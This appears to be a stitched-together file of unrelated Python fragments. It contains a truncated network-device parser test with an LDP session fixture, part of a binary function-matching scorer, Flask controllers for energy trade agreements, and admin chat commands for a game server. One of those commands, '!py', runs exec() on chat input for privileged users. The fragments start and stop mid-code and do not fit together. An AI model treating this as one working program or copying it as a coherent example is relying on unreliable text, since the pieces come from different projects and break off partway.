device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-session-information": {
"ldp-session": {
"ldp-connection-state": "Open",
"ldp-graceful-restart-local": "disabled",
"ldp-graceful-restart-remote": "disabled",
"ldp-holdtime": "30",
"ldp-keepalive-interval": "10",
"ldp-keepalive-time": "3",
"ldp-local-address": "10.34.2.250",
"ldp-local-helper-mode": "enabled",
"ldp-local-label-adv-mode": "Downstream unsolicited",
"ldp-local-maximum-reconnect": "120000",
"ldp-local-maximum-recovery": "240000",
"ldp-mtu-discovery": "disabled",
"ldp-neg-label-adv-mode": "Downstream unsolicited",
"ldp-neighbor-address": "10.169.14.240",
"ldp-neighbor-count": "1",
"ldp-neighbor-types": {
"ldp-neighbor-type": "discovered"
},
"ldp-remaining-time": "23",
"ldp-remote-address": "10.169.14.240",
"ldp-remote-helper-mode": "enabled",
"ldp-remote-label-adv-mode": "Downstream unsolicited",
"ldp-retry-interval": "1",
"ldp-session-address": {
"interface-address": "10.169.14.157"
},
"ldp-session-capabilities-advertised": {
"ldp-capability": "none"
},
"ldp-session-capabilities-received": {
"ldp-capability": "none"
},
"ldp-session-flags": {
"ldp-session-flag": "none"
},
"ldp-session-id": "10.34.2.250:0--10.169.14.240:0",
"ldp-session-max-pdu": "4096",
"ldp-session-nsr-state": "Not in sync",
"ldp-session-protection": {
"ldp-session-protection-state": "disabled"
},
"ldp-session-role": "Passive",
"ldp-session-state": "Operational",
"ldp-up-time": "00:00:47"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp session 10.169.14.240 detail
Address: 10.169.14.240, State: Operational, Connection: Open, Hold time: 23
Session ID: 10.34.2.250:0--10.169.14.240:0
Next | |
frame_size_score = -1 * abs(self.frame - bin_ctx.frame) * FUNC_FRAME_SCORE
# check for a probable match
if abs(frame_size_score) <= FRAME_SIZE_THRESHOLD * FUNC_FRAME_SCORE:
frame_size_score += ARTIFACT_MATCH_SCORE
logger.debug("Frame size score: %f", frame_size_score)
score += frame_size_score
# 5. Match calls
calls_score = ComparableContext.compareCalls(self, bin_ctx)
logger.debug("Calls score: %f", calls_score)
score += calls_score
# 6. Match code blocks
code_blocks_score = 0
for index, block in enumerate(self.blocks):
code_blocks_score -= abs(self.blocks[index] - ((bin_ctx.blocks[index] * instr_ratio) if index < len(bin_ctx.blocks) else 0)) * BLOCK_MATCH_SCORE
for j in range(index + 1, len(bin_ctx.blocks)):
code_blocks_score -= bin_ctx.blocks[j] * BLOCK_MISMATCH_SCORE * instr_ratio
# check for a probable match
if abs(code_blocks_score) <= INSTR_COUNT_THRESHOLD * INSTR_COUNT_SCORE:
code_blocks_score += ARTIFACT_MATCH_SCORE
logger.debug("Code blocks score: %f", code_blocks_score)
score += code_blocks_score
# 7. Match function calls (hints)
call_hints_score = 0
merged_hints = 0
if bin_ctx.call_hints is not None and len(bin_ctx.call_hints) > 0 and self in bin_ctx.call_hints:
merged_hints = len([x for x in bin_ctx.call_hints if x.hash == self.hash])
# prioritize merged hints
call_hints_score += FUNC_HINT_SCORE * 1.0 * (merged_hints ** 1.5) / len(bin_ctx.call_hints)
logger.debug("Call hints score: %f", call_hints_score)
score += call_hints_score
# 8. Match xrefs calls (hints)
if len(bin_ctx.xref_hints) > 0:
xref_hints_score = FUNC_HINT_SCORE * bin_ctx.xref_hints.count(self) * 1.0 / len(bin_ctx.xref_hints)
logger.debug("Xref hints score: %f", xref_hints_score)
score += xref_hints_score
# 9. Existence check (followers) or non static binary function
if len(self.followers) > 0 or not bin_ctx.is_static:
logger.debug("We have (%d) followers / are static (%s) - grant an existence bonus: %f", len(self.followers), str(bin_ctx.is_static), EXISTENCE_BOOST_SCORE)
score += EXISTENCE_BOOST_SCORE
# 10. Match external calls
externals_score = ComparableContext.compareExternals(self, bin_ctx)
logger.debug("Externals score: %f", externals_score)
score += externals_score
# 11. Possible static deduction (if no probability for a collision)
if self.is_static and merged_hints == 0:
static_penalty = 0
for xref in bin_ctx.xrefs:
if self.file not in xref.files:
static_penalty += STATIC_VIOLATION_PENALTY
logger.debug("Static penalty score: %f", static_penalty)
score -= static_penalty
# 12. Score boost
if boost_score:
score *= 2
logger.debug("Score boost")
# Overall result
logger.debug("Overall score is: %f", score)
logger.removeIndent()
return score
def serialize(self):
"""Serialize the context into a dict.
Return Value:
dict representing the context instance, prepared for a future JSON dump
"""
result = {}
result["Function Name"] = self.name
result["Instruction Count"] = self.instrs
result["Stack Frame Size"] = self.frame
result["Hash"] = self.hash
result["Is Static"] = self.is_static
result["Numeric Consts"] = list(self.consts)
result["Strings"] = list(self.strings)
result["Calls"] = list(self.calls)
result["Unknown Functions"] = list(self.unknown_funcs)
result["Unknown Globals"] = list(self.unknown_fptrs)
result["Code Block Sizes"] = self.blocks
result["Call Order"] = self.call_order
return result
@staticmethod
def deserialize(serialized_ctx, source_index):
"""Deserialize the stored context from it's file representation dict.
Args:
serialized_ctx (dict): a dict containing a serialize()d context instance
source_index (int): source index for the current function
Return value:
The newly created context instance, built according to the serialized form
"""
context = SourceContext(serialized_ctx["Function Name"], source_index)
# Numeric Consts
[context.recordConst(int(x)) for x in serialized_ctx["Numeric Consts"]]
# Strings
[context.recordString(x) for x in serialized_ctx["Strings"]]
# Function Calls
[context.recordCall(x) for x in serialized_ctx["Calls"]]
# Unknowns
[context.recordUnknown(x, False) for x in serialized_ctx["Unknown Functions"]]
[context.recordUnknown(x, True) for x in serialized_ctx["Unknown Globals"]]
# Hash
context.setHash(serialized_ctx["Hash"])
# Frame size
context.setFrame(serialized_ctx["Stack Frame Size"])
# Function size
context.setInstrCount(serialized_ctx["Instruction Count"])
# Function Blocks
[context.recordBlock(x) for x in serialized_ctx["Code Block Sizes"]]
# Call order
context.setCallOrder(serialized_ctx["Call Order"])
# Is static
if serialized_ctx["Is Static"]:
context.markStatic()
# Now rank the consts
context.rankConsts()
return context
class BinaryContext(BinFileFunction, FunctionContext):
"""A context that describes the full canonical representation of a binary function, with all of it's logic.
Attributes
----------
call_hints (set): set of potential matches derived by lists of function calls from matched functions
xref_hints (list): list potential matches derived by lists of xrefs from matched functions
collision_map (dict): a mapping of seen collision options: hint id ==> list of possible (seen) collisions
taken_collision (bool): True iff was merged as part of a collision
merged_sources (list): list of merged source functions (in a collision case)
"""
def __init__(self, ea, name, index):
"""Create a binary function context.
Args:
ea (int): effective address of the given code chunk
name (str): temporary (?) name given by the disassembler
index (int): index of the function in the global array of all binary functions
"""
BinFileFunction.__init__(self, ea, name, index)
FunctionContext.__init__(self)
# matching hints
self.call_hints = None
self.xref_hints = []
# validity flag
self.exists = True
# Compilation clues
self.is_static = False
# Linker optimizations
self.collision_map = defaultdict(set)
self.taken_collision = False
self.merged_sources = []
# Overridden base function
def declareMatch(self, match):
"""Declare a match between our a bin context and a source context.
Args:
match (SourceContext): the matching source context
"""
self.match = match
# notify our hints that we are out of the game
if self.call_hints is not None:
for hint in list(self.call_hints):
self.removeHint(hint, clear=True)
for hint in list(self.xref_hints):
self.removeHint(hint, clear=True)
# If we chose a collision candidate, when we saw the possibility for a collision, it means it is indeed an active collision
if match.hash in self.collision_map or (len(self.files) > 0 and match.file not in self.files):
self.merged_sources.append(match)
self.taken_collision = True
# make sure that our match will always be in our map
if match.hash not in self.collision_map:
self.collision_map[match.hash] = set()
# make sure the collision map won't allow conflicting collisions
new_collisions = defaultdict(set)
if match.hash in self.collision_map:
new_collisions[match.hash] = self.collision_map[match.hash]
self.collision_map = new_collisions
# Overridden base function
def isPartial(self):
"""Tell us that the current instance is a full function.
Return Value:
Always False
"""
return False
# Overridden base function
def valid(self):
"""Check if the function is still valid (still active).
Return Value:
True iff the function still exists in the file matching process
"""
return self.exists
# Overridden base function
def preprocess(self):
"""Preform preprocess calculations once here after initialization, to avoid performance costs later."""
self.rankConsts()
# Overridden base function
def active(self):
"""Check if the given function is still in the matching game.
Return Value:
True iff the function is valid and wasn't matched yet
"""
# special case for collisions
return self.valid() and (self.mergePotential() or not self.matched())
# Overridden base function
def selfCheck(self):
"""Double checks our hints, and keeps only those who match our possible file candidates."""
for hint in set(self.xref_hints) | (self.call_hints if self.call_hints is not None else set()):
# bye bye, hint
if not hint.isValidCandidate(self):
self.removeHint(hint)
# Overridden base function
def isLinkerOptimizationCandidate(self, src_ctx):
"""Check if the given source context can be a possible match for a linker optimized version of our binary function.
Args:
src_ctx (context): source context of the candidate source function
Return Value:
True iff the src ctx is file-suitable as a collision match candidate
"""
# edge case for possibile collision candidates
# 1. Matched to one candidate, and checking to merge more src functions
if self.merged() and self.match in src_ctx.collision_candidates:
return True
# 2. Didn't match yet, however one collision candidate is a valid candidate
for collision in src_ctx.collision_candidates:
if collision.file in self.files:
return True
# If we reached this point, it looks like they don't belong to each other
return False
# Overridden base function
def merged(self):
"""Check if this is a merged (collision) function.
Return value:
True iff this is a merged function
"""
return self.taken_collision
def mergePotential(self):
"""Check if this is a collision function with a potential to merge more src functions.
Return value:
True iff this is a merged function with growth potential
"""
return self.matched() and (not self.match.isPartial()) and len([x for x in self.match.collision_candidates if not x.matched()]) > 0
def isHinted(self):
"""Check if our function was hinted at sometimes - meaning we should suspect it is a valid function.
Return value:
True iff the function has any call/xref hint granted by other functions
"""
return (self.call_hints is not None and len(self.call_hints) > 0) or len(self.xref_hints) > 0
def addHints(self, hints, is_call):
"""Add a set of (source) match hints to help us filter our existing hints.
Args:
hint (collection): a collection of (source) function potential matches (containing FunctionContext instances)
is_call (bool): True iff call hints, otherwise xref hints
"""
new_hints = [x for x in hints if x.isValidCandidate(self)]
# Saw | |
import csv
import marshmallow_dataclass as md
from io import StringIO
from datetime import datetime, timedelta
from functools import partial
from flask import make_response
from originexample import logger
from originexample.auth import User, UserQuery, requires_login
from originexample.db import inject_session, atomic
from originexample.http import Controller
from originexample.facilities import Facility, FacilityQuery
from originexample.common import DateTimeRange, DataSet
from originexample.pipelines import start_consume_back_in_time_pipeline
import originexample.services.account as acc
from .helpers import get_resolution, update_transfer_priorities
from .queries import AgreementQuery
from .email import (
send_invitation_received_email,
send_invitation_accepted_email,
send_invitation_declined_email,
)
from .models import (
TradeAgreement,
MappedTradeAgreement,
AgreementDirection,
AgreementState,
GetAgreementListResponse,
GetAgreementSummaryRequest,
GetAgreementSummaryResponse,
SubmitAgreementProposalRequest,
SubmitAgreementProposalResponse,
RespondToProposalRequest,
CountPendingProposalsResponse,
WithdrawProposalRequest,
GetAgreementDetailsRequest,
GetAgreementDetailsResponse,
CancelAgreementRequest,
SetTransferPriorityRequest,
SetFacilitiesRequest,
FindSuppliersRequest,
FindSuppliersResponse,
)
account = acc.AccountService()
# -- Controllers -------------------------------------------------------------
class AbstractAgreementController(Controller):
def map_agreement_for(self, user, agreement):
"""
:param TradeAgreement agreement:
:param User user:
:rtype: MappedTradeAgreement
"""
if agreement.is_inbound_to(user):
return self.map_inbound_agreement(agreement)
elif agreement.is_outbound_from(user):
return self.map_outbound_agreement(agreement)
else:
raise RuntimeError('This should NOT have happened!')
def map_inbound_agreement(self, agreement):
"""
:param TradeAgreement agreement:
:rtype: MappedTradeAgreement
"""
return MappedTradeAgreement(
direction=AgreementDirection.INBOUND,
state=agreement.state,
public_id=agreement.public_id,
counterpart_id=agreement.user_from.sub,
counterpart=agreement.user_from.company,
date_from=agreement.date_from,
date_to=agreement.date_to,
amount=agreement.amount,
unit=agreement.unit,
amount_percent=agreement.amount_percent,
technologies=agreement.technologies,
reference=agreement.reference,
limit_to_consumption=agreement.limit_to_consumption,
proposal_note=agreement.proposal_note,
)
def map_outbound_agreement(self, agreement):
"""
:param TradeAgreement agreement:
:rtype: MappedTradeAgreement
"""
if agreement.facility_gsrn:
facilities = self.get_facilities(
agreement.user_from, agreement.facility_gsrn)
else:
facilities = []
return MappedTradeAgreement(
direction=AgreementDirection.OUTBOUND,
state=agreement.state,
public_id=agreement.public_id,
counterpart_id=agreement.user_to.sub,
counterpart=agreement.user_to.company,
date_from=agreement.date_from,
date_to=agreement.date_to,
amount=agreement.amount,
unit=agreement.unit,
amount_percent=agreement.amount_percent,
technologies=agreement.technologies,
reference=agreement.reference,
limit_to_consumption=agreement.limit_to_consumption,
proposal_note=agreement.proposal_note,
facilities=facilities,
)
@inject_session
def get_facilities(self, user, facility_gsrn, session):
"""
:param User user:
:param list[str] facility_gsrn:
:param Session session:
:rtype: list[Facility]
"""
return FacilityQuery(session) \
.belongs_to(user) \
.has_any_gsrn(facility_gsrn) \
.all()
class GetAgreementList(AbstractAgreementController):
"""
TODO
"""
Response = md.class_schema(GetAgreementListResponse)
@requires_login
@inject_session
def handle_request(self, user, session):
"""
:param User user:
:param Session session:
:rtype: GetAgreementListResponse
"""
# Invitations currently awaiting response by this user
pending = AgreementQuery(session) \
.is_proposed_to(user) \
.is_pending() \
.order_by(TradeAgreement.created.asc()) \
.all()
# Invitations sent by this user awaiting response by another user
sent = AgreementQuery(session) \
.is_proposed_by(user) \
.is_pending() \
.order_by(TradeAgreement.created.asc()) \
.all()
# Inbound agreements currently active
inbound = AgreementQuery(session) \
.is_inbound_to(user) \
.is_accepted() \
.order_by(TradeAgreement.created.asc()) \
.all()
# Outbound agreements currently active
outbound = AgreementQuery(session) \
.is_outbound_from(user) \
.is_accepted() \
.order_by(TradeAgreement.transfer_priority.asc()) \
.all()
# Formerly accepted agreements which has now been cancelled
cancelled = AgreementQuery(session) \
.belongs_to(user) \
.is_cancelled() \
.is_cancelled_recently() \
.order_by(TradeAgreement.cancelled.desc()) \
.all()
# Formerly proposed agreements which has now been declined
declined = AgreementQuery(session) \
.belongs_to(user) \
.is_declined() \
.is_declined_recently() \
.order_by(TradeAgreement.declined.desc()) \
.all()
map_agreement = partial(self.map_agreement_for, user)
return GetAgreementListResponse(
success=True,
pending=list(map(map_agreement, pending)),
sent=list(map(map_agreement, sent)),
inbound=list(map(map_agreement, inbound)),
outbound=list(map(map_agreement, outbound)),
cancelled=list(map(map_agreement, cancelled)),
declined=list(map(map_agreement, declined)),
)
class GetAgreementDetails(AbstractAgreementController):
"""
TODO
"""
Request = md.class_schema(GetAgreementDetailsRequest)
Response = md.class_schema(GetAgreementDetailsResponse)
@requires_login
@inject_session
def handle_request(self, request, user, session):
"""
:param GetAgreementDetailsRequest request:
:param User user:
:param Session session:
:rtype: GetAgreementDetailsResponse
"""
agreement = AgreementQuery(session) \
.has_public_id(request.public_id) \
.belongs_to(user) \
.one_or_none()
if agreement:
agreement = self.map_agreement_for(user, agreement)
return GetAgreementDetailsResponse(
success=agreement is not None,
agreement=agreement,
)
class GetAgreementSummary(AbstractAgreementController):
"""
TODO
"""
Request = md.class_schema(GetAgreementSummaryRequest)
Response = md.class_schema(GetAgreementSummaryResponse)
@requires_login
@inject_session
def handle_request(self, request, user, session):
"""
:param GetAgreementSummaryRequest request:
:param User user:
:param Session session:
:rtype: GetAgreementListResponse
"""
agreement = None
if request.date_range:
resolution = get_resolution(request.date_range.delta)
else:
resolution = acc.SummaryResolution.MONTH
if request.public_id:
agreement = AgreementQuery(session) \
.has_public_id(request.public_id) \
.belongs_to(user) \
.one_or_none()
if request.direction is AgreementDirection.INBOUND:
direction = acc.TransferDirection.INBOUND
elif request.direction is AgreementDirection.OUTBOUND:
direction = acc.TransferDirection.OUTBOUND
else:
direction = None
ggos, labels = self.get_agreement_summary(
request=request,
token=user.access_token,
resolution=resolution,
utc_offset=request.utc_offset,
direction=direction,
reference=agreement.public_id if agreement else None,
)
return GetAgreementSummaryResponse(
success=True,
labels=labels,
ggos=ggos,
)
def get_agreement_summary(self, request, token, resolution, utc_offset,
direction=None, reference=None):
"""
:param GetMeasurementsRequest request:
:param str token:
:param SummaryResolution resolution:
:param int utc_offset:
:param TransferDirection direction:
:param str reference:
:rtype: (list[DataSet], list[str])
"""
if request.date_range:
begin_range = DateTimeRange.from_date_range(request.date_range)
fill = True
else:
begin_range = None
fill = False
response = account.get_transfer_summary(
token=token,
request=acc.GetTransferSummaryRequest(
direction=direction,
resolution=resolution,
utc_offset=utc_offset,
fill=fill,
grouping=[acc.SummaryGrouping.TECHNOLOGY],
filters=acc.TransferFilters(
reference=[reference] if reference else None,
begin_range=begin_range,
),
)
)
datasets = [DataSet(g.group[0], g.values) for g in response.groups]
return datasets, response.labels
class CancelAgreement(Controller):
"""
TODO
"""
Request = md.class_schema(CancelAgreementRequest)
@requires_login
@inject_session
def handle_request(self, request, user, session):
"""
:param CancelAgreementRequest request:
:param User user:
:param Session session:
:rtype: bool
"""
agreement = AgreementQuery(session) \
.has_public_id(request.public_id) \
.belongs_to(user) \
.one_or_none()
if agreement:
# Agreement must be cancelled and its transaction committed to
# the database before updating transfer priorities, hence both
# are executed in a transaction for themselves sequentially
self.cancel_agreement(agreement.public_id, user)
self.update_transfer_priorities(agreement.user_from)
return True
else:
return False
@atomic
def cancel_agreement(self, public_id, user, session):
"""
TODO
"""
AgreementQuery(session) \
.has_public_id(public_id) \
.belongs_to(user) \
.one() \
.cancel()
@atomic
def update_transfer_priorities(self, *args, **kwargs):
"""
TODO
"""
update_transfer_priorities(*args, **kwargs)
class SetTransferPriority(Controller):
"""
TODO
"""
Request = md.class_schema(SetTransferPriorityRequest)
@requires_login
def handle_request(self, request, user):
"""
:param SetTransferPriorityRequest request:
:param User user:
:rtype: bool
"""
self.update_transfer_priorities(
request.public_ids_prioritized, user)
self.complete_priorities(user)
return True
@atomic
def update_transfer_priorities(self, public_ids_prioritized, user, session):
"""
:param list[str public_ids_prioritized:
:param User user:
:param Session session:
:rtype: bool
"""
agreements = AgreementQuery(session) \
.is_outbound_from(user) \
.is_accepted()
# Initially remove priority for all agreements
agreements.update({TradeAgreement.transfer_priority: None})
# Set priorities in the order they were provided
for i, public_id in enumerate(public_ids_prioritized):
agreements \
.has_public_id(public_id) \
.update({TradeAgreement.transfer_priority: i})
return True
@atomic
def complete_priorities(self, *args, **kwargs):
"""
TODO
"""
update_transfer_priorities(*args, **kwargs)
class SetFacilities(Controller):
"""
TODO
"""
Request = md.class_schema(SetFacilitiesRequest)
@requires_login
@atomic
def handle_request(self, request, user, session):
"""
:param SetFacilitiesRequest request:
:param User user:
:param sqlalchemy.orm.Session session:
:rtype: bool
"""
raise Exception('TODO')
agreement = AgreementQuery(session) \
.belongs_to(user) \
.has_public_id(request.public_id) \
.one_or_none()
if agreement:
agreement.facility_ids = [f.id for f in self.get_facilities(
user, request.facility_public_ids, session)]
return True
else:
return False
def get_facilities(self, user, facility_public_ids, session):
"""
:param User user:
:param list[str] facility_public_ids:
:param Session session:
"""
return FacilityQuery(session) \
.belongs_to(user) \
.has_any_public_id(facility_public_ids) \
.all()
class FindSuppliers(Controller):
"""
TODO
"""
Request = md.class_schema(FindSuppliersRequest)
Response = md.class_schema(FindSuppliersResponse)
@requires_login
@atomic
def handle_request(self, request, user, session):
"""
:param FindSuppliersRequest request:
:param User user:
:param sqlalchemy.orm.Session session:
:rtype: FindSuppliersResponse
"""
return FindSuppliersResponse(
success=True,
suppliers=self.get_suppliers(request, user),
)
def get_suppliers(self, request, user):
"""
:param FindSuppliersRequest request:
:param User user:
:rtype: list[User]
"""
response = account.find_suppliers(
token=user.access_token,
request=acc.FindSuppliersRequest(
date_range=request.date_range,
min_amount=request.min_amount,
min_coverage=0.8,
)
)
return [u for u in map(self.get_user, response.suppliers) if u]
@inject_session
def get_user(self, subject, session):
"""
:param str subject:
:param sqlalchemy.orm.Session session:
:rtype: User
"""
return UserQuery(session) \
.is_active() \
.has_sub(subject) \
.one_or_none()
# -- Proposals ---------------------------------------------------------------
class SubmitAgreementProposal(Controller):
"""
TODO
"""
Request = md.class_schema(SubmitAgreementProposalRequest)
Response = md.class_schema(SubmitAgreementProposalResponse)
@requires_login
@atomic
def handle_request(self, request, user, session):
"""
:param SubmitAgreementProposalRequest request:
:param User user:
:param Session session:
:rtype: SubmitAgreementProposalResponse
"""
counterpart = UserQuery(session) \
.is_active() \
.has_public_id(request.counterpart_id) \
.exclude(user) \
.one_or_none()
if not counterpart:
return SubmitAgreementProposalResponse(success=False)
if request.direction == AgreementDirection.INBOUND:
user_from = counterpart
user_to = user
elif request.direction == AgreementDirection.OUTBOUND:
user_from = user
user_to = counterpart
else:
raise RuntimeError('This should NOT have happened!')
agreement = self.create_pending_agreement(
request=request,
user=user,
user_from=user_from,
user_to=user_to,
)
session.add(agreement)
session.flush()
logger.info(f'User submitted TradeAgreement proposal', extra={
'subject': user.sub,
'target': counterpart.sub,
'agreement_id': agreement.id,
})
# Send e-mail to recipient of proposal
send_invitation_received_email(agreement)
return SubmitAgreementProposalResponse(success=True)
def create_pending_agreement(self, request, user, user_from, user_to):
"""
:param SubmitAgreementProposalRequest request:
:param User user:
:param User user_from:
:param User user_to:
:rtype: TradeAgreement
"""
agreement = TradeAgreement(
user_proposed=user,
user_from=user_from,
user_to=user_to,
state=AgreementState.PENDING,
date_from=request.date.begin,
date_to=request.date.end,
reference=request.reference,
amount=request.amount,
unit=request.unit,
amount_percent=request.amount_percent,
technologies=request.technologies,
limit_to_consumption=request.limit_to_consumption,
proposal_note=request.proposal_note,
facility_gsrn=request.facility_gsrn,
)
return agreement
class RespondToProposal(Controller):
"""
TODO
"""
Request = md.class_schema(RespondToProposalRequest)
@requires_login
@atomic
def handle_request(self, request, user, session):
"""
:param RespondToProposalRequest request:
:param User user:
:param Session session:
:rtype: bool
"""
agreement = AgreementQuery(session) \
.has_public_id(request.public_id) \
.is_awaiting_response_by(user) \
.one_or_none()
if not agreement:
return False
if request.accept:
# Accept proposal
self.accept_proposal(request, agreement, user, session)
else:
# Decline proposal
self.decline_proposal(agreement, user)
return True
def accept_proposal(self, request, agreement, user, session):
"""
:param RespondToProposalRequest request:
:param TradeAgreement agreement:
:param User user:
:param Session session:
"""
agreement.state = AgreementState.ACCEPTED
agreement.transfer_priority = self.get_next_priority(
agreement.user_from, session)
if request.technologies and self.can_set_technology(agreement):
agreement.technologies = request.technologies
if request.facility_gsrn and self.can_set_facilities(agreement, user):
agreement.facility_gsrn = request.facility_gsrn
if request.amount_percent and self.can_set_amount_percent(agreement, user):
agreement.amount_percent = request.amount_percent
logger.info(f'User accepted to TradeAgreement proposal', extra={
'subject': user.sub,
'agreement_id': agreement.id,
})
start_consume_back_in_time_pipeline(
user=agreement.user_from,
begin_from=datetime.fromordinal(agreement.date_from.toordinal()) - timedelta(days=2),
begin_to=datetime.fromordinal(agreement.date_to.toordinal()) + timedelta(days=2),
)
# Send e-mail to proposing user
send_invitation_accepted_email(agreement)
def decline_proposal(self, agreement, user):
"""
:param TradeAgreement agreement:
:param User user:
"""
agreement.decline_proposal()
logger.info(f'User declined to TradeAgreement proposal', extra={
'subject': user.sub,
'agreement_id': agreement.id,
})
# Send e-mail to proposing user
send_invitation_declined_email(agreement)
def can_set_technology(self, agreement):
| |
f'{t} was unsilenced.'
""" Admin commands
# The commands below are relatively dangerous,
# and are generally for managing players.
"""
@command(Privileges.Admin, hidden=True)
async def ban(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Ban a specified player's account, with a reason."""
if len(msg) < 2:
return 'Invalid syntax: !ban <name> <reason>'
# find any user matching (including offline).
if not (t := await glob.players.get(name=msg[0], sql=True)):
return f'"{msg[0]}" not found.'
if t.priv & Privileges.Staff and not p.priv & Privileges.Dangerous:
return 'Only developers can manage staff members.'
reason = ' '.join(msg[1:])
await t.ban(p, reason)
return f'{t} was banned.'
@command(Privileges.Admin, hidden=True)
async def unban(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Unban a specified player's account, with a reason."""
if (len_msg := len(msg)) < 2:
return 'Invalid syntax: !ban <name> <reason>'
# find any user matching (including offline).
if not (t := await glob.players.get(name=msg[0], sql=True)):
return f'"{msg[0]}" not found.'
if t.priv & Privileges.Staff and not p.priv & Privileges.Dangerous:
return 'Only developers can manage staff members.'
reason = ' '.join(msg[2:]) if len_msg > 2 else None
await t.unban(p, reason)
return f'{t} was unbanned.'
@command(Privileges.Admin, hidden=True)
async def alert(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Send a notification to all players."""
if len(msg) < 1:
return 'Invalid syntax: !alert <msg>'
glob.players.enqueue(packets.notification(' '.join(msg)))
return 'Alert sent.'
@command(Privileges.Admin, hidden=True)
async def alertu(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Send a notification to a specified player by name."""
if len(msg) < 2:
return 'Invalid syntax: !alertu <name> <msg>'
if not (t := await glob.players.get(name=msg[0])):
return 'Could not find a user by that name.'
t.enqueue(packets.notification(' '.join(msg[1:])))
return 'Alert sent.'
""" Developer commands
# The commands below are either dangerous or
# simply not useful for any other roles.
"""
@command(Privileges.Dangerous)
async def recalc(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Performs a full PP recalc on a specified map, or all maps."""
if len(msg) != 1 or msg[0] not in ('map', 'all'):
return 'Invalid syntax: !recalc <map/all>'
score_counts = [] # keep track of # of scores recalced
if msg[0] == 'map':
# recalculate all scores on their last /np'ed map.
if not p.last_np:
return 'You must /np a map first!'
ppcalc = await PPCalculator.from_id(p.last_np.id)
if not ppcalc:
return 'Could not retrieve map file.'
await c.send(glob.bot, f'Performing full recalc on {p.last_np.embed}.')
for table in ('scores_vn', 'scores_rx', 'scores_ap'):
# fetch all scores from the table on this map
scores = await glob.db.fetchall(
'SELECT id, acc, mods, max_combo, '
'n300, n100, n50, nmiss, ngeki, nkatu '
f'FROM {table} WHERE map_md5 = %s '
'AND status = 2 AND mode = 0',
[p.last_np.md5]
)
score_counts.append(len(scores))
if not scores:
continue
for score in scores:
ppcalc.mods = Mods(score['mods'])
ppcalc.combo = score['max_combo']
ppcalc.nmiss = score['nmiss']
ppcalc.acc = score['acc']
pp, _ = await ppcalc.perform() # sr not needed
await glob.db.execute(
f'UPDATE {table} '
'SET pp = %s '
'WHERE id = %s',
[pp, score['id']]
)
else:
# recalculate all scores on every map
if not p.priv & Privileges.Dangerous:
return 'This command is limited to developers.'
return 'TODO'
recap = '{0} vn | {1} rx | {2} ap'.format(*score_counts)
return f'Recalculated {sum(score_counts)} ({recap}) scores.'
# NOTE: this is pretty useless since it doesn't switch anything other
# than the c[e4-6].ppy.sh domains; it exists on bancho as a tournament
# server switch mechanism, perhaps we could leverage this in the future.
@command(Privileges.Dangerous, hidden=True)
async def switchserv(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Switch your client's internal endpoints to a specified IP address."""
if len(msg) != 1:
return 'Invalid syntax: !switch <endpoint>'
p.enqueue(packets.switchTournamentServer(msg[0]))
return 'Have a nice journey..'
# rest in peace rtx - oct 2020 :candle:
#@command(Privileges.Dangerous, hidden=True)
#async def rtx(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
# """Send an RTX packet with a message to a user."""
# if len(msg) != 2:
# return 'Invalid syntax: !rtx <name> <msg>'
#
# if not (t := await glob.players.get(name=msg[0])):
# return 'Could not find a user by that name.'
#
# t.enqueue(packets.RTX(msg[1]))
# return 'pong'
@command(Privileges.Dangerous, hidden=True)
async def debug(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Toggle the console's debug setting."""
glob.config.debug = not glob.config.debug
return f"Toggled {'on' if glob.config.debug else 'off'}."
# TODO: this command is rly bad, it probably
# shouldn't really be a command to begin with..
str_priv_dict = defaultdict(lambda: None, {
'normal': Privileges.Normal,
'verified': Privileges.Verified,
'whitelisted': Privileges.Whitelisted,
'supporter': Privileges.Supporter,
'premium': Privileges.Premium,
'tournament': Privileges.Tournament,
'nominator': Privileges.Nominator,
'mod': Privileges.Mod,
'admin': Privileges.Admin,
'dangerous': Privileges.Dangerous
})
@command(Privileges.Dangerous, hidden=True)
async def setpriv(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Set privileges for a specified player (by name)."""
if len(msg) < 2:
return 'Invalid syntax: !setpriv <name> <role1 role2 role3 ...>'
priv = Privileges(0)
for m in msg[1:]:
if not (_priv := str_priv_dict[m]):
return f'Not found: {m}.'
priv |= _priv
if not (t := await glob.players.get(name=msg[0], sql=True)):
return 'Could not find user.'
await t.update_privs(priv)
return f"Updated {t}'s privileges."
# TODO: figure out better way :(
@command(Privileges.Dangerous, aliases=['men'], hidden=True)
async def menu_preview(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
"""Temporary command to illustrate cmyui's menu option idea."""
async def callback():
# this is called when the menu item is clicked
p.enqueue(packets.notification('clicked!'))
# add the option to their menu opts & send them a button
opt_id = await p.add_to_menu(callback)
return f'[osu://dl/{opt_id} option]'
# XXX: this actually comes in handy sometimes, i initially
# wrote it completely as a joke, but i might keep it in for
# devs.. Comes in handy when debugging to be able to run something
# like `!py return (await glob.players.get(name='cmyui')).status.action`
# or for anything while debugging on-the-fly..
@command(Privileges.Dangerous)
async def py(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
# create the new coroutine definition as a string
# with the lines from our message (split by '\n').
lines = ' '.join(msg).split(r'\n')
definition = '\n '.join(['async def __py(p, c, msg):'] + lines)
try: # def __py(p, c, msg)
exec(definition)
loop = asyncio.get_event_loop()
try: # __py(p, c, msg)
task = loop.create_task(locals()['__py'](p, c, msg))
ret = await asyncio.wait_for(asyncio.shield(task), 5.0)
except asyncio.TimeoutError:
ret = 'Left running (took >=5 sec).'
except Exception as e:
# code was invalid, return
# the error in the osu! chat.
ret = f'{e.__class__}: {e}'
if ret is not None:
return str(ret)
else:
return 'Success'
""" Multiplayer commands
# The commands below are specifically for
# multiplayer match management.
"""
@mp_commands.add(Privileges.Normal, aliases=['h'])
async def mp_help(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Show information of all documented mp commands the player can access."""
prefix = glob.config.command_prefix
cmds = []
for cmd in mp_commands.commands:
